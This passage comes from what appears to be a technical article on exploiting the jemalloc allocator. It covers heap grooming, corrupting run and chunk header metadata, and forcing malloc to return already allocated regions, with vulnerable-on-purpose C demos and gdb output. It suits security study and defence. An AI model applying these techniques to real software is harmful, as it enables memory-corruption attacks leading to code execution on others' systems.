#define NFREE (NALLOC / 10) /* number of deallocations */
|
|
|
|
char *foo[NALLOC];
|
|
char *bar[NALLOC];
|
|
|
|
printf("step 1: controlled allocations of victim objects\n");
|
|
|
|
for(i = 0; i < NALLOC; i++)
|
|
{
|
|
foo[i] = malloc(TSIZE);
|
|
printf("foo[%d]:\t\t0x%x\n", i, (unsigned int)foo[i]);
|
|
}
|
|
|
|
printf("step 2: creating holes in between the victim objects\n");
|
|
|
|
for(i = (NALLOC - NFREE); i < NALLOC; i += 2)
|
|
{
|
|
printf("freeing foo[%d]:\t0x%x\n", i, (unsigned int)foo[i]);
|
|
free(foo[i]);
|
|
}
|
|
|
|
printf("step 3: fill holes with vulnerable objects\n");
|
|
|
|
for(i = (NALLOC - NFREE + 1); i < NALLOC; i += 2)
|
|
{
|
|
bar[i] = malloc(TSIZE);
|
|
printf("bar[%d]:\t0x%x\n", i, (unsigned int)bar[i]);
|
|
}
|
|
|
|
|
|
jemalloc's behavior can be observed in the output; remember that our target
|
|
size class is 16 bytes:
|
|
|
|
|
|
$ ./test-holes
|
|
step 1: controlled allocations of victim objects
|
|
foo[0]: 0x40201030
|
|
foo[1]: 0x40201040
|
|
foo[2]: 0x40201050
|
|
foo[3]: 0x40201060
|
|
foo[4]: 0x40201070
|
|
foo[5]: 0x40201080
|
|
foo[6]: 0x40201090
|
|
foo[7]: 0x402010a0
|
|
|
|
...
|
|
|
|
foo[447]: 0x40202c50
|
|
foo[448]: 0x40202c60
|
|
foo[449]: 0x40202c70
|
|
foo[450]: 0x40202c80
|
|
foo[451]: 0x40202c90
|
|
foo[452]: 0x40202ca0
|
|
foo[453]: 0x40202cb0
|
|
foo[454]: 0x40202cc0
|
|
foo[455]: 0x40202cd0
|
|
foo[456]: 0x40202ce0
|
|
foo[457]: 0x40202cf0
|
|
foo[458]: 0x40202d00
|
|
foo[459]: 0x40202d10
|
|
foo[460]: 0x40202d20
|
|
|
|
...
|
|
|
|
step 2: creating holes in between the victim objects
|
|
freeing foo[450]: 0x40202c80
|
|
freeing foo[452]: 0x40202ca0
|
|
freeing foo[454]: 0x40202cc0
|
|
freeing foo[456]: 0x40202ce0
|
|
freeing foo[458]: 0x40202d00
|
|
freeing foo[460]: 0x40202d20
|
|
freeing foo[462]: 0x40202d40
|
|
freeing foo[464]: 0x40202d60
|
|
freeing foo[466]: 0x40202d80
|
|
freeing foo[468]: 0x40202da0
|
|
freeing foo[470]: 0x40202dc0
|
|
freeing foo[472]: 0x40202de0
|
|
freeing foo[474]: 0x40202e00
|
|
freeing foo[476]: 0x40202e20
|
|
freeing foo[478]: 0x40202e40
|
|
freeing foo[480]: 0x40202e60
|
|
freeing foo[482]: 0x40202e80
|
|
freeing foo[484]: 0x40202ea0
|
|
freeing foo[486]: 0x40202ec0
|
|
freeing foo[488]: 0x40202ee0
|
|
freeing foo[490]: 0x40202f00
|
|
freeing foo[492]: 0x40202f20
|
|
freeing foo[494]: 0x40202f40
|
|
freeing foo[496]: 0x40202f60
|
|
freeing foo[498]: 0x40202f80
|
|
|
|
step 3: fill holes with vulnerable objects
|
|
bar[451]: 0x40202c80
|
|
bar[453]: 0x40202ca0
|
|
bar[455]: 0x40202cc0
|
|
bar[457]: 0x40202ce0
|
|
bar[459]: 0x40202d00
|
|
bar[461]: 0x40202d20
|
|
bar[463]: 0x40202d40
|
|
bar[465]: 0x40202d60
|
|
bar[467]: 0x40202d80
|
|
bar[469]: 0x40202da0
|
|
bar[471]: 0x40202dc0
|
|
bar[473]: 0x40202de0
|
|
bar[475]: 0x40202e00
|
|
bar[477]: 0x40202e20
|
|
bar[479]: 0x40202e40
|
|
bar[481]: 0x40202e60
|
|
bar[483]: 0x40202e80
|
|
bar[485]: 0x40202ea0
|
|
bar[487]: 0x40202ec0
|
|
bar[489]: 0x40202ee0
|
|
bar[491]: 0x40202f00
|
|
bar[493]: 0x40202f20
|
|
bar[495]: 0x40202f40
|
|
bar[497]: 0x40202f60
|
|
bar[499]: 0x40202f80
|
|
|
|
|
|
We can see that jemalloc works in a FIFO way; the first region freed is the
|
|
first returned for a subsequent allocation request. Although our example
|
|
mainly demonstrates how to manipulate the jemalloc heap to exploit adjacent
|
|
region corruptions, our observations can also help us to exploit
|
|
use-after-free vulnerabilities. When our goal is to get data of our own
|
|
choosing in the same region as a freed region about to be used, jemalloc's
|
|
FIFO behavior can help us place our data in a predictable way.
|
|
|
|
In the above discussion we have implicitly assumed that we can make
|
|
arbitrary allocations and deallocations; i.e. that we have available in
|
|
our exploitation tool belt allocation and deallocation primitives for
|
|
our target size. Depending on the vulnerable application (that relies
|
|
on jemalloc) this may or may not be straightforward. For example, if
|
|
our target is a media player we may be able to control allocations by
|
|
introducing an arbitrary number of metadata tags in the input file. In
|
|
the case of Firefox we can of course use Javascript to implement our
|
|
heap primitives. But that's the topic of another paper.
|
|
|
|
|
|
----[ 3.3 - Metadata corruption
|
|
|
|
The final heap corruption primitive we will focus on is the corruption of
|
|
metadata. We will once again remind you that since jemalloc is not based
|
|
on freelists (it uses macro-based red black trees instead), unlink and
|
|
frontlink exploitation techniques are not usable. We will instead pay
|
|
attention to how we can force 'malloc()' to return a pointer that points
|
|
to already initialized heap regions.
|
|
|
|
|
|
------[ 3.3.1 - Run (arena_run_t)
|
|
|
|
We have already defined what a 'run' is in section 2.1.3. We will briefly
|
|
remind the reader that a 'run' is just a collection of memory regions of
|
|
equal size that starts with some metadata describing it. Recall that runs
|
|
are always aligned to a multiple of the page size (0x1000 in most real
|
|
life applications). The run metadata obey the layout shown in [2-3].
|
|
|
|
For release builds the 'magic' field will not be present (that is,
|
|
MALLOC_DEBUG is off by default). As we have already mentioned, each
|
|
run contains a pointer to the bin whose regions it contains. The 'bin'
|
|
pointer is read and dereferenced from 'arena_run_t' (see [2-3]) only
|
|
during deallocation. On deallocation the region size is unknown, thus the
|
|
bin index cannot be computed directly. Instead, jemalloc will first find
|
|
the run in which the memory to be freed is located and then dereference the
|
|
bin pointer stored in the run's header. From function 'arena_dalloc_small':
|
|
|
|
|
|
arena_dalloc_small(arena_t *arena, arena_chunk_t *chunk, void *ptr,
|
|
arena_chunk_map_t *mapelm)
|
|
{
|
|
arena_run_t *run;
|
|
arena_bin_t *bin;
|
|
size_t size;
|
|
|
|
run = (arena_run_t *)(mapelm->bits & ~pagesize_mask);
|
|
bin = run->bin;
|
|
size = bin->reg_size;
|
|
|
|
|
|
On the other hand, during the allocation process, once the appropriate run
|
|
is located, its 'regs_mask[]' bit vector is examined in search of a free
|
|
region. Note that the search for a free region starts at
|
|
'regs_mask[regs_minelm]' ('regs_minelm' holds the index of the first
|
|
'regs_mask[]' element that has nonzero bits). We will exploit this fact to
|
|
force 'malloc()' to return an already allocated region.
|
|
|
|
In a heap overflow situation it is pretty common for the attacker to be
|
|
able to overflow a memory region which is not followed by other regions
|
|
(like the wilderness chunk in dlmalloc, but in jemalloc such regions are
|
|
not that special). In such a situation, the attacker will most likely be
|
|
able to overwrite the run header of the next run. Since runs hold memory
|
|
regions of equal size, the next page aligned address will either be a
|
|
normal page of the current run, or will contain the metadata (header) of
|
|
the next run which will hold regions of different size (larger or smaller,
|
|
it doesn't really matter). In the first case, overwriting adjacent regions
|
|
of the same run is possible and thus an attacker can use the techniques
|
|
that were previously discussed in 3.1. The latter case is the subject of
|
|
the following paragraphs.
|
|
|
|
People already familiar with heap exploitation may recall that it is
|
|
pretty common for an attacker to control the last heap item (region in our
|
|
case) allocated, that is the most recently allocated region is the one
|
|
being overflown. Because of the importance of this situation, we believe
|
|
it is essential to have a look at how we can leverage it to gain control
|
|
of the target process.
|
|
|
|
Let's first have a look at what the in-memory model of a run looks like
|
|
(file test-run.c):
|
|
|
|
|
|
char *first;
|
|
|
|
first = (char *)malloc(16);
|
|
printf("first = %p\n", first);
|
|
memset(first, 'A', 16);
|
|
|
|
breakpoint();
|
|
|
|
free(first);
|
|
|
|
|
|
The test program is compiled and a debugging build of jemalloc is loaded
|
|
to be used with gdb.
|
|
|
|
|
|
~$ gcc -g -Wall test-run.c -o test-run
|
|
~$ export LD_PRELOAD=/usr/src/lib/libc/libc.so.7
|
|
~$ gdb test-run
|
|
GNU gdb 6.1.1 [FreeBSD]
|
|
...
|
|
(gdb) run
|
|
...
|
|
first = 0x28201030
|
|
|
|
Program received signal SIGTRAP, Trace/breakpoint trap.
|
|
main () at simple.c:14
|
|
14 free(first);
|
|
|
|
|
|
The call to malloc() returns the address 0x28201030 which belongs to the
|
|
run at 0x28201000.
|
|
|
|
|
|
(gdb) print *(arena_run_t *)0x28201000
|
|
$1 = {bin = 0x8049838, regs_minelm = 0, nfree = 252,
|
|
regs_mask = {4294967294}}
|
|
(gdb) print *(arena_bin_t *)0x8049838
|
|
$2 = {runcur = 0x28201000, runs = {...}, reg_size = 16, run_size = 4096,
|
|
nregs = 253, regs_mask_nelms = 8, reg0_offset = 48}
|
|
|
|
|
|
Oki doki, run 0x28201000 services the requests for memory regions of size
|
|
16 as indicated by the 'reg_size' value of the bin pointer stored in the
|
|
run header (notice that run->bin->runcur == run).
|
|
|
|
Now let's proceed with studying a scenario that can lead to 'malloc()'
|
|
exploitation. For our example let's assume that the attacker controls
|
|
a memory region 'A' which is the last in its run.
|
|
|
|
|
|
[run #1 header][RR...RA][run #2 header][RR...]
|
|
|
|
|
|
In the simple diagram shown above, 'R' stands for a normal region which may
|
|
or may not be allocated while 'A' corresponds to the region that belongs to
|
|
the attacker, i.e. it is the one that will be overflown. 'A' does not
|
|
strictly need to be the last region of run #1. It can also be any region of
|
|
the run. Let's explore how from a region on run #1 we can reach the
|
|
metadata of run #2 (file test-runhdr.c, also see [2-6]):
|
|
|
|
|
|
unsigned char code[] = "\x61\x62\x63\x64";
|
|
|
|
one = malloc(0x10);
|
|
memset(one, 0x41, 0x10);
|
|
printf("[+] region one:\t\t0x%x: %s\n", (unsigned int)one, one);
|
|
|
|
two = malloc(0x10);
|
|
memset(two, 0x42, 0x10);
|
|
printf("[+] region two:\t\t0x%x: %s\n", (unsigned int)two, two);
|
|
|
|
three = malloc(0x20);
|
|
memset(three, 0x43, 0x20);
|
|
printf("[+] region three:\t0x%x: %s\n", (unsigned int)three, three);
|
|
|
|
__asm__("int3");
|
|
|
|
printf("[+] corrupting the metadata of region three's run\n");
|
|
memcpy(two + 4032, code, 4);
|
|
|
|
__asm__("int3");
|
|
|
|
|
|
At the first breakpoint we can see that for size 16 the run is at
|
|
0xb7d01000 and for size 32 the run is at 0xb7d02000:
|
|
|
|
|
|
gdb $ r
|
|
[Thread debugging using libthread_db enabled]
|
|
[+] region one: 0xb7d01030: AAAAAAAAAAAAAAAA
|
|
[+] region two: 0xb7d01040: BBBBBBBBBBBBBBBB
|
|
[+] region three: 0xb7d02020: CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
|
|
|
|
Program received signal SIGTRAP, Trace/breakpoint trap.
|
|
|
|
gdb $ print arenas[0].bins[3].runcur
|
|
$5 = (arena_run_t *) 0xb7d01000
|
|
gdb $ print arenas[0].bins[4].runcur
|
|
$6 = (arena_run_t *) 0xb7d02000
|
|
|
|
|
|
The metadata of run 0xb7d02000 are:
|
|
|
|
|
|
gdb $ x/30x 0xb7d02000
|
|
0xb7d02000: 0xb7fd3134 0x00000000 0x0000007e 0xfffffffe
|
|
0xb7d02010: 0xffffffff 0xffffffff 0x7fffffff 0x00000000
|
|
0xb7d02020: 0x43434343 0x43434343 0x43434343 0x43434343
|
|
0xb7d02030: 0x43434343 0x43434343 0x43434343 0x43434343
|
|
0xb7d02040: 0x00000000 0x00000000 0x00000000 0x00000000
|
|
|
|
|
|
After the memcpy() and at the second breakpoint:
|
|
|
|
|
|
gdb $ x/30x 0xb7d02000
|
|
0xb7d02000: 0x64636261 0x00000000 0x0000007e 0xfffffffe
|
|
0xb7d02010: 0xffffffff 0xffffffff 0x7fffffff 0x00000000
|
|
0xb7d02020: 0x43434343 0x43434343 0x43434343 0x43434343
|
|
0xb7d02030: 0x43434343 0x43434343 0x43434343 0x43434343
|
|
0xb7d02040: 0x00000000 0x00000000 0x00000000 0x00000000
|
|
|
|
|
|
We can see that the run's metadata and specifically the address of the
|
|
'bin' element (see [2-3]) has been overwritten. One way or another, the
|
|
attacker will be able to alter the contents of run #2's header, but once
|
|
this has happened, what's the potential of achieving code execution?
|
|
|
|
A careful reader would have already thought the obvious; one can overwrite
|
|
the 'bin' pointer to make it point to a fake bin structure of his own.
|
|
Well, this is not a good idea for two reasons. First, the attacker
|
|
needs further control of the target process in order to successfully
|
|
construct a fake bin header somewhere in memory. Secondly, and most
|
|
importantly, as it has already been discussed, the 'bin' pointer of a
|
|
region's run header is dereferenced only during deallocation. A careful
|
|
study of the jemalloc source code reveals that only 'run->bin->reg0_offset'
|
|
is actually used (somewhere in 'arena_run_reg_dalloc()'), thus, from an
|
|
attacker's point of view, the bin pointer is not that interesting
|
|
('reg0_offset' overwrite may cause further problems as well leading to
|
|
crashes and a forced interrupt of our exploit).
|
|
|
|
Our attack consists of the following steps. The attacker overflows
|
|
'A' and overwrites run #2's header. Then, upon the next malloc() of
|
|
a size equal to the size serviced by run #2, the user will get as a
|
|
result a pointer to a memory region of the previous run (run #1 in our
|
|
example). It is important to understand that in order for the attack to
|
|
work, the overflown run should serve regions that belong to any of the
|
|
available bins. Let's further examine our case (file vuln-run.c):
|
|
|
|
|
|
char *one, *two, *three, *four, *temp;
|
|
char offset[sizeof(size_t)];
|
|
int i;
|
|
|
|
if(argc < 2)
|
|
{
|
|
printf("%s <offset>\n", argv[0]);
|
|
return 0;
|
|
}
|
|
|
|
/* User supplied value for 'regs_minelm'. */
|
|
*(size_t *)&offset[0] = (size_t)atol(argv[1]);
|
|
|
|
printf("Allocating a chunk of 16 bytes just for fun\n");
|
|
one = (char *)malloc(16);
|
|
printf("one = %p\n", one);
|
|
|
|
/* All those allocations will fall inside the same run. */
|
|
printf("Allocating first chunk of 32 bytes\n");
|
|
two = (char *)malloc(32);
|
|
printf("two = %p\n", two);
|
|
|
|
printf("Performing more 32 byte allocations\n");
|
|
for(i = 0; i < 10; i++)
|
|
{
|
|
temp = (char *)malloc(32);
|
|
printf("temp = %p\n", temp);
|
|
}
|
|
|
|
/* This will allocate a new run for size 64. */
|
|
printf("Setting up a run for the next size class\n");
|
|
three = (char *)malloc(64);
|
|
printf("three = %p\n", three);
|
|
|
|
/* Overwrite 'regs_minelm' of the next run. */
|
|
breakpoint();
|
|
memcpy(two + 4064 + 4, offset, 4);
|
|
breakpoint();
|
|
|
|
printf("Next chunk should point in the previous run\n");
|
|
four = (char *)malloc(64);
|
|
printf("four = %p\n", four);
|
|
|
|
|
|
vuln-run.c requires the user to supply a value to be written to
|
|
'regs_minelm' of the next run. To achieve reliable results we have to
|
|
somehow control the memory contents at 'regs_mask[regs_minelm]' as well.
|
|
By taking a closer look at the layout of 'arena_run_t', we can see that by
|
|
supplying the value -2 for 'regs_minelm', we can force
|
|
'regs_mask[regs_minelm]' to point to 'regs_minelm' itself. That is,
|
|
'regs_minelm[-2] = -2' :)
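
To see why this aliasing works, recall the 'arena_run_t' layout from [2-3]
(also visible in the gdb dump earlier in this section): 'bin', 'regs_minelm'
and 'nfree' sit back to back, immediately followed by 'regs_mask[]'. The
mock structure below is not jemalloc's own definition; it merely mirrors
that layout to demonstrate the trick:

struct mock_run {               /* mirrors arena_run_t, release build */
        void *bin;
        unsigned regs_minelm;
        unsigned nfree;
        unsigned regs_mask[1];  /* dynamically sized in jemalloc */
};

struct mock_run r;

r.regs_minelm = (unsigned)-2;

/* regs_mask[-2] lies two words before regs_mask[0], which is exactly
 * where regs_minelm lives (this holds for both ILP32 and LP64). The
 * access is out of bounds on purpose; that is the whole trick. */
printf("0x%x\n", r.regs_mask[-2]);      /* prints 0xfffffffe */
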
|
|
|
|
Well, depending on the target application, other values may also be
|
|
applicable but -2 is a safe one that does not cause further problems in the
|
|
internals of jemalloc and avoids forced crashes.
|
|
|
|
From function 'arena_run_reg_alloc':
|
|
|
|
|
|
static inline void *
|
|
arena_run_reg_alloc(arena_run_t *run, arena_bin_t *bin)
|
|
{
|
|
void *ret;
|
|
unsigned i, mask, bit, regind;
|
|
|
|
...
|
|
|
|
i = run->regs_minelm;
|
|
mask = run->regs_mask[i]; /* [3-4] */
|
|
if (mask != 0) {
|
|
/* Usable allocation found. */
|
|
bit = ffs((int)mask) - 1; /* [3-5] */
|
|
|
|
regind = ((i << (SIZEOF_INT_2POW + 3)) + bit); /* [3-6] */
|
|
...
|
|
ret = (void *)(((uintptr_t)run) + bin->reg0_offset
|
|
+ (bin->reg_size * regind)); /* [3-7] */
|
|
|
|
...
|
|
return (ret);
|
|
}
|
|
|
|
...
|
|
}
|
|
|
|
|
|
Initially, 'i' gets the value of 'run->regs_minelm' which is equal to -2.
|
|
On the assignment at [3-4], 'mask' receives the value 'regs_mask[-2]' which
|
|
happens to be the value of 'regs_minelm', that is -2. The binary
|
|
representation of -2 is 0xfffffffe thus 'ffs()' (man ffs(3) for those who
|
|
haven't used 'ffs()' before) will return 2, so, 'bit' will equal 1. As if
|
|
it wasn't fucking tiring so far, at [3-6], 'regind' is computed as
|
|
'((0xfffffffe << 5) + 1)' which equals 0xffffffc1 or -63. Now do the maths:
|
|
for 'reg_size' values belonging to small-medium sized regions, the formula
|
|
at [3-7] calculates 'ret' in such a way that 'ret' receives a pointer to a
|
|
memory region 63 regions backwards :)
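
The arithmetic can be double-checked with a few lines of C
('SIZEOF_INT_2POW' is 2 on the 32-bit systems used throughout this
article):

#include <stdio.h>
#include <strings.h>            /* ffs() */

#define SIZEOF_INT_2POW 2

int
main(void)
{
        unsigned i = (unsigned)-2;              /* regs_minelm        */
        unsigned mask = i;                      /* regs_mask[-2] == i */
        unsigned bit = ffs((int)mask) - 1;      /* ffs(0xfffffffe) = 2 */
        int regind = (int)((i << (SIZEOF_INT_2POW + 3)) + bit);

        printf("bit = %u, regind = %d\n", bit, regind); /* 1, -63 */
        return (0);
}
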
|
|
|
|
Now it's time for some hands on practice:
|
|
|
|
|
|
~$ gdb ./vuln-run
|
|
GNU gdb 6.1.1 [FreeBSD]
|
|
...
|
|
(gdb) run -2
|
|
Starting program: vuln-run -2
|
|
Allocating a chunk of 16 bytes just for fun
|
|
one = 0x28202030
|
|
Allocating first chunk of 32 bytes
|
|
two = 0x28203020
|
|
Performing more 32 byte allocations
|
|
...
|
|
temp = 0x28203080
|
|
...
|
|
Setting up a run for the next size class
|
|
three = 0x28204040
|
|
|
|
Program received signal SIGTRAP, Trace/breakpoint trap.
|
|
main (argc=Error accessing memory address 0x0: Bad address.
|
|
) at vuln-run.c:35
|
|
35 memcpy(two + 4064 + 4, offset, 4);
|
|
(gdb) c
|
|
Continuing.
|
|
|
|
Program received signal SIGTRAP, Trace/breakpoint trap.
|
|
main (argc=Error accessing memory address 0x0: Bad address.
|
|
) at vuln-run.c:38
|
|
38 printf("Next chunk should point in the previous run\n");
|
|
(gdb) c
|
|
Continuing.
|
|
Next chunk should point in the previous run
|
|
four = 0x28203080
|
|
|
|
Program exited normally.
|
|
(gdb) q
|
|
|
|
|
|
Notice how the memory region numbered 'four' (64 bytes) points exactly
|
|
where the region named 'temp' (32 bytes) starts. Voila :)
|
|
|
|
|
|
------[ 3.3.2 - Chunk (arena_chunk_t)
|
|
|
|
In the previous section we described the potential of achieving arbitrary
|
|
code execution by overwriting the run header metadata. Trying to cover
|
|
all the possibilities, we will now focus on what the attacker can do
|
|
once she is able to corrupt the chunk header of an arena. Although
|
|
the probability of directly affecting a nearby arena is low, a memory
|
|
leak or the indirect control of the heap layout by continuous bin-sized
|
|
allocations can render the technique described in this section a useful
|
|
tool in the attacker's hand.
|
|
|
|
Before continuing with our analysis, let's set the foundations of the
|
|
test case we will cover.
|
|
|
|
[[Arena #1 header][R...R][C...C]]
|
|
|
|
As we have already mentioned in the previous sections, new arena chunks
|
|
are created at will depending on whether the current arena is full
|
|
(that is, jemalloc is unable to find a non-full run to service the
|
|
current allocation) or whether the target application runs on multiple
|
|
threads. Thus a good way to force the initialization of a new arena chunk
|
|
is to continuously force the target application to perform allocations,
|
|
preferably bin-sized ones. In the figure above, letter 'R' indicates the
|
|
presence of memory regions that are already allocated while 'C' denotes
|
|
regions that may be free. By continuously requesting memory regions,
|
|
the available arena regions may be depleted forcing jemalloc to allocate
|
|
a new arena (what is, in fact, allocated is a new chunk called an arena
|
|
chunk, by calling 'arena_chunk_alloc()' which usually calls 'mmap()').
|
|
|
|
The low level function responsible for allocating memory pages (called
|
|
'pages_map()') is used by 'chunk_alloc_mmap()' in a way that makes it
|
|
possible for several distinct arenas (and any possible arena extensions)
|
|
to be physically adjacent. So, once the attacker requests a bunch of
|
|
new allocations, the memory layout may resemble the following figure.
|
|
|
|
[[Arena #1 header][R...R][C...C]][[Arena #2 header][...]]
|
|
|
|
It is now obvious that overflowing the last chunk of arena #1 will
|
|
result in the arena chunk header of arena #2 getting overwritten. It is
|
|
thus interesting to take a look at how one can take advantage of such
|
|
a situation.
|
|
|
|
The following code is one of those typical vulnerable-on-purpose programs
|
|
you usually come across in Phrack articles ;) The scenario we will be
|
|
analyzing in this section is the following: The attacker forces the
|
|
target application to allocate a new arena by controlling the heap
|
|
allocations. She then triggers the overflow in the last region of the
|
|
previous arena (the region that physically borders the new arena) thus
|
|
corrupting the chunk header metadata (see [2-5] on the diagram). When the
|
|
application calls 'free()' on any region of the newly allocated arena,
|
|
the jemalloc housekeeping information is altered. On the next call to
|
|
'malloc()', the allocator will return a region that points to already
|
|
allocated space of (preferably) the previous arena. Take your time
|
|
to carefully study the following snippet since it is essential for
|
|
understanding this attack (full code in vuln-chunk.c):
|
|
|
|
|
|
char *base1, *base2;
|
|
char *p1, *p2, *p3, *last, *first;
|
|
char buffer[1024];
|
|
int fd, l;
|
|
|
|
p1 = (char *)malloc(16);
|
|
base1 = (char *)CHUNK_ADDR2BASE(p1);
|
|
print_arena_chunk(base1);
|
|
|
|
/* [3-8] */
|
|
|
|
/* Simulate the fact that we somehow control heap allocations.
|
|
* This will consume the first chunk, and will force jemalloc
|
|
* to allocate a new chunk for this arena.
|
|
*/
|
|
last = NULL;
|
|
|
|
while((base2 = (char *)CHUNK_ADDR2BASE((first = malloc(16)))) == base1)
|
|
last = first;
|
|
|
|
print_arena_chunk(base2);
|
|
|
|
/* [3-9] */
|
|
|
|
/* Allocate one more region right after the first region of the
|
|
* new chunk. This is done for demonstration purposes only.
|
|
*/
|
|
p2 = malloc(16);
|
|
|
|
/* This is how the chunks look like at this point:
|
|
*
|
|
* [HAAAA....L][HFPUUUU....U]
|
|
*
|
|
* H: Chunk header
|
|
* A: Allocated regions
|
|
* L: The chunk pointed to by 'last'
|
|
* F: The chunk pointed to by 'first'
|
|
* P: The chunk pointed to by 'p2'
|
|
* U: Unallocated space
|
|
*/
|
|
fprintf(stderr, "base1: %p vs. base2: %p (+%d)\n",
|
|
base1, base2, (ptrdiff_t)(base2 - base1));
|
|
|
|
fprintf(stderr, "p1: %p vs. p2: %p (+%d)\n",
|
|
p1, p2, (ptrdiff_t)(p2 - p1));
|
|
|
|
/* [3-10] */
|
|
|
|
if(argc > 1) {
|
|
if((fd = open(argv[1], O_RDONLY)) > 0) {
|
|
/* Read the contents of the given file. We assume this file
|
|
* contains the exploitation vector.
|
|
*/
|
|
memset(buffer, 0, sizeof(buffer));
|
|
l = read(fd, buffer, sizeof(buffer));
|
|
close(fd);
|
|
|
|
/* Copy data in the last chunk of the previous arena chunk. */
|
|
fprintf(stderr, "Read %d bytes\n", l);
|
|
memcpy(last, buffer, l);
|
|
}
|
|
}
|
|
|
|
/* [3-11] */
|
|
|
|
/* Trigger the bug by free()ing any chunk in the new arena. We
|
|
* can achieve the same results by deallocating 'first'.
|
|
*/
|
|
free(p2);
|
|
print_region(first, 16);
|
|
|
|
/* [3-12] */
|
|
|
|
/* Now 'p3' will point to an already allocated region (in this
|
|
	 * example, 'p3' will overlap 'first').
|
|
*/
|
|
p3 = malloc(4096);
|
|
|
|
/* [3-13] */
|
|
|
|
fprintf(stderr, "p3 = %p\n", p3);
|
|
memset(p3, 'A', 4096);
|
|
|
|
/* 'A's should appear in 'first' which was previously zeroed. */
|
|
print_region(first, 16);
|
|
return 0;
|
|
|
|
|
|
Before going further, the reader is advised to read the comments and the
|
|
code above very carefully. You can safely ignore 'print_arena_chunk()'
|
|
and 'print_region()', they are defined in the file lib.h found in the code
|
|
archive and are used for debugging purposes only. The snippet is actually
|
|
split in 6 parts which can be distinguished by their corresponding '[3-x]'
|
|
tags. Briefly, in part [3-8], the vulnerable program performs a number
|
|
of allocations in order to fill up the available space served by the
|
|
first arena. This emulates the fact that an attacker somehow controls
|
|
the order of allocations and deallocations on the target, a fair and
|
|
very common prerequisite. Additionally, the last call to 'malloc()'
|
|
(the one before the while loop breaks) forces jemalloc to allocate a new
|
|
arena chunk and return the first available memory region. Part [3-9],
|
|
performs one more allocation, one that will lie next to the first (that
|
|
is the second region of the new arena). This final allocation is there
|
|
for demonstration purposes only (check the comments for more details).
|
|
|
|
Part [3-10] is where the actual overflow takes place and part [3-11]
|
|
calls 'free()' on one of the regions of the newly allocated arena. Before
|
|
explaining the rest of the vulnerable code, let's see what's going on when
|
|
'free()' gets called on a memory region.
|
|
|
|
|
|
void
|
|
free(void *ptr)
|
|
{
|
|
...
|
|
if (ptr != NULL) {
|
|
...
|
|
idalloc(ptr);
|
|
}
|
|
}
|
|
|
|
static inline void
|
|
idalloc(void *ptr)
|
|
{
|
|
...
|
|
chunk = (arena_chunk_t *)CHUNK_ADDR2BASE(ptr); /* [3-14] */
|
|
if (chunk != ptr)
|
|
arena_dalloc(chunk->arena, chunk, ptr); /* [3-15] */
|
|
else
|
|
huge_dalloc(ptr);
|
|
}
|
|
|
|
|
|
The 'CHUNK_ADDR2BASE()' macro at [3-14] returns the pointer to the chunk
|
|
that the given memory region belongs to. In fact, what it does is just
|
|
a simple pointer trick to get the first address before 'ptr' that is
|
|
aligned to a multiple of a chunk size (1 or 2 MB by default, depending
|
|
on the jemalloc flavor used). If this chunk does not belong to a so-
|
|
called huge allocation, then the allocator knows that it definitely
|
|
belongs to an arena. As previously stated, an arena chunk begins with
|
|
a special header, called 'arena_chunk_t', which, as expected, contains
|
|
a pointer to the arena that this chunk is part of.
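
The pointer trick itself is nothing more than masking off the low bits of
the address; conceptually it boils down to the following sketch (the macro
names and the chunk size are illustrative, the real definition lives in
jemalloc's source and uses the runtime chunk size):

#include <stdint.h>

#define MY_CHUNKSIZE    (1 << 20)       /* e.g. 1 MB chunks */
#define MY_CHUNK_MASK   (MY_CHUNKSIZE - 1)

/* Round 'a' down to the start of the chunk that contains it. */
#define MY_ADDR2BASE(a) \
        ((void *)((uintptr_t)(a) & ~(uintptr_t)MY_CHUNK_MASK))

With 1 MB chunks, MY_ADDR2BASE((void *)0x28201030) evaluates to 0x28200000,
which matches the region and chunk addresses seen in the earlier debugging
session.
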
|
|
|
|
Now recall that in part [3-10] of the vulnerable snippet presented
|
|
above, the attacker is able to overwrite the first few bytes of the next
|
|
arena chunk. Consequently, the 'chunk->arena' pointer that points to
|
|
the arena is under the attacker's control. From now on, the reader may
|
|
safely assume that all functions called by 'arena_dalloc()' at [3-15]
|
|
may receive an arbitrary value for the arena pointer:
|
|
|
|
|
|
static inline void
|
|
arena_dalloc(arena_t *arena, arena_chunk_t *chunk, void *ptr)
|
|
{
|
|
size_t pageind;
|
|
arena_chunk_map_t *mapelm;
|
|
...
|
|
|
|
pageind = (((uintptr_t)ptr - (uintptr_t)chunk) >> PAGE_SHIFT);
|
|
mapelm = &chunk->map[pageind];
|
|
...
|
|
|
|
if ((mapelm->bits & CHUNK_MAP_LARGE) == 0) {
|
|
/* Small allocation. */
|
|
malloc_spin_lock(&arena->lock);
|
|
arena_dalloc_small(arena, chunk, ptr, mapelm); /* [3-16] */
|
|
malloc_spin_unlock(&arena->lock);
|
|
}
|
|
else
|
|
arena_dalloc_large(arena, chunk, ptr); /* [3-17] */
|
|
}
|
|
|
|
|
|
Entering 'arena_dalloc()', one can see that the 'arena' pointer
|
|
is not used much; it's just passed to 'arena_dalloc_small()'
|
|
or 'arena_dalloc_large()' depending on the size class of the
|
|
memory region being deallocated. It is interesting to note that the
|
|
aforementioned size class is determined by inspecting 'mapelm->bits'
|
|
which, hopefully, is under the influence of the attacker. Following
|
|
the path taken by 'arena_dalloc_small()' results in many complications
|
|
that will most probably ruin our attack (hint for the interested
|
|
reader - pointer arithmetics performed by 'arena_run_reg_dalloc()'
|
|
are kinda dangerous). For this purpose, we choose to follow function
|
|
'arena_dalloc_large()':
|
|
|
|
|
|
static void
|
|
arena_dalloc_large(arena_t *arena, arena_chunk_t *chunk, void *ptr)
|
|
{
|
|
malloc_spin_lock(&arena->lock);
|
|
...
|
|
|
|
size_t pageind = ((uintptr_t)ptr - (uintptr_t)chunk) >>
|
|
PAGE_SHIFT; /* [3-18] */
|
|
size_t size = chunk->map[pageind].bits & ~PAGE_MASK; /* [3-19] */
|
|
|
|
...
|
|
arena_run_dalloc(arena, (arena_run_t *)ptr, true);
|
|
malloc_spin_unlock(&arena->lock);
|
|
}
|
|
|
|
|
|
There are two important things to notice in the snippet above. The first
|
|
thing to note is the way 'pageind' is calculated. Variable 'ptr' points
|
|
to the start of the memory region to be free()'ed while 'chunk' is the
|
|
address of the corresponding arena chunk. For a chunk that starts at
|
|
e.g. 0x28200000, the first region to be given out to the user may start
|
|
at 0x28201030 mainly because of the overhead involving the metadata of
|
|
chunk, arena and run headers as well as their bitmaps. A careful reader
|
|
may notice that 0x28201030 is more than a page away from the start
|
|
of the chunk, so 'pageind' is larger than or equal to 1. It is for this
|
|
